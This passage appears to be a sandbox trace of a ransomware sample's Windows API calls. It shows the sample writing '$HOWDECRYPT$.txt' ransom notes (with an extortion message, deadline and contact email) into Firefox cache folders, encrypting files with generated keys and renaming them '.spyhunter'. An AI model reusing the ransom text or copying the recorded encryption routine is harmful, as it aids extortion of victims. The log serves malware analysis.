"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_001_.spyhunter")) returned 1 [0155.111] GetProcessHeap () returned 0x2c0000 [0155.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.111] GetProcessHeap () returned 0x2c0000 [0155.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.111] GetProcessHeap () returned 0x2c0000 [0155.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd770 | out: hHeap=0x2c0000) returned 1 [0155.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.112] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.112] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb57*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec80, lpOverlapped=0x0 | out: lpBuffer=0x270eb57*, lpNumberOfBytesWritten=0x270ec80*=0x127, lpOverlapped=0x0) returned 1 [0155.113] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.113] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec80, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec80*=0x2ac, lpOverlapped=0x0) returned 1 [0155.113] CloseHandle (hObject=0xa0) returned 1 [0155.113] GetProcessHeap () returned 0x2c0000 [0155.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2b88 | out: hHeap=0x2c0000) returned 1 [0155.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.115] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.115] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb53*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x270eb53*, lpNumberOfBytesWritten=0x270ec7c*=0x127, lpOverlapped=0x0) returned 1 [0155.115] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.115] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec7c*=0x2ac, lpOverlapped=0x0) returned 1 [0155.116] CloseHandle (hObject=0xa0) returned 1 [0155.116] GetProcessHeap () returned 0x2c0000 [0155.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2a50 | out: hHeap=0x2c0000) returned 1 [0155.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec18 | out: pbBuffer=0x270ec18) returned 1 [0155.116] GetProcessHeap () returned 0x2c0000 [0155.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.116] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec10*=0x30) returned 1 [0155.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01") returned 109 [0155.117] StrStrW (lpFirst="ECB2Dd01", lpSrch=".txt") returned 0x0 [0155.117] GetProcessHeap () returned 0x2c0000 [0155.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0155.117] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ebd4*=0x2800, lpOverlapped=0x0) returned 1 [0155.146] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.146] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebd4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ebd4*=0x2800, lpOverlapped=0x0) returned 1 [0155.146] GetProcessHeap () returned 0x2c0000 [0155.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0155.146] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.146] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebd4, lpOverlapped=0x0 | out: lpBuffer=0x270ec14*, lpNumberOfBytesWritten=0x270ebd4*=0x4, lpOverlapped=0x0) returned 1 [0155.189] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebd4*=0x30, lpOverlapped=0x0) returned 1 [0155.189] CloseHandle (hObject=0xa0) returned 1 [0155.189] GetProcessHeap () returned 0x2c0000 [0155.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.189] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.spyhunter") returned 119 [0155.189] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.spyhunter")) returned 1 [0155.190] GetProcessHeap () returned 0x2c0000 [0155.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.191] GetProcessHeap () returned 0x2c0000 [0155.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.220] GetProcessHeap () returned 0x2c0000 [0155.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd648 | out: hHeap=0x2c0000) returned 1 [0155.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\b\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.221] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.221] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb4b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x270eb4b*, lpNumberOfBytesWritten=0x270ec74*=0x127, lpOverlapped=0x0) returned 1 [0155.222] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.222] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec74, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec74*=0x2ac, lpOverlapped=0x0) returned 1 [0155.222] CloseHandle (hObject=0xa0) returned 1 [0155.222] GetProcessHeap () returned 0x2c0000 [0155.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc26a8 | out: hHeap=0x2c0000) returned 1 [0155.222] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\a\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.224] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.224] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec70, lpOverlapped=0x0 | out: lpBuffer=0x270eb47*, lpNumberOfBytesWritten=0x270ec70*=0x127, lpOverlapped=0x0) returned 1 [0155.225] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.225] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec70*=0x2ac, lpOverlapped=0x0) returned 1 [0155.225] CloseHandle (hObject=0xa0) returned 1 [0155.225] GetProcessHeap () returned 0x2c0000 [0155.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2570 | out: hHeap=0x2c0000) returned 1 [0155.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.226] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.226] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x270eb43*, lpNumberOfBytesWritten=0x270ec6c*=0x127, lpOverlapped=0x0) returned 1 [0155.227] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.227] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec6c*=0x2ac, lpOverlapped=0x0) returned 1 [0155.227] CloseHandle (hObject=0xa0) returned 1 [0155.227] GetProcessHeap () returned 0x2c0000 [0155.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2438 | out: hHeap=0x2c0000) returned 1 [0155.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.228] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0155.228] WriteFile (in: hFile=0xa0, lpBuffer=0x270eb3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ec68, lpOverlapped=0x0 | out: lpBuffer=0x270eb3f*, lpNumberOfBytesWritten=0x270ec68*=0x127, lpOverlapped=0x0) returned 1 [0155.228] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0155.228] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ec68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ec68*=0x2ac, lpOverlapped=0x0) returned 1 [0155.229] CloseHandle (hObject=0xa0) returned 1 [0155.229] GetProcessHeap () returned 0x2c0000 [0155.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc2300 | out: hHeap=0x2c0000) returned 1 [0155.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec08 | out: pbBuffer=0x270ec08) returned 1 [0155.240] GetProcessHeap () returned 0x2c0000 [0155.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0155.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec00*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec00*=0x30) returned 1 [0155.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0155.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01") returned 109 [0155.241] StrStrW (lpFirst="F17B2d01", lpSrch=".txt") returned 0x0 [0155.241] GetProcessHeap () returned 0x2c0000 [0155.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.241] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ebc4*=0x2800, lpOverlapped=0x0) returned 1 [0155.248] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.248] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ebc4*=0x2800, lpOverlapped=0x0) returned 1 [0155.248] GetProcessHeap () returned 0x2c0000 [0155.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0155.248] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.248] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ebc4, lpOverlapped=0x0 | out: lpBuffer=0x270ec04*, lpNumberOfBytesWritten=0x270ebc4*=0x4, lpOverlapped=0x0) returned 1 [0155.283] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ebc4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ebc4*=0x30, lpOverlapped=0x0) returned 1 [0155.283] CloseHandle (hObject=0xa0) returned 1 [0155.283] GetProcessHeap () returned 0x2c0000 [0155.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0155.283] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.spyhunter") returned 119 [0155.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.spyhunter")) returned 1 [0155.284] GetProcessHeap () returned 0x2c0000 [0155.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0155.285] GetProcessHeap () returned 0x2c0000 [0155.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0155.285] GetProcessHeap () returned 0x2c0000 [0155.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 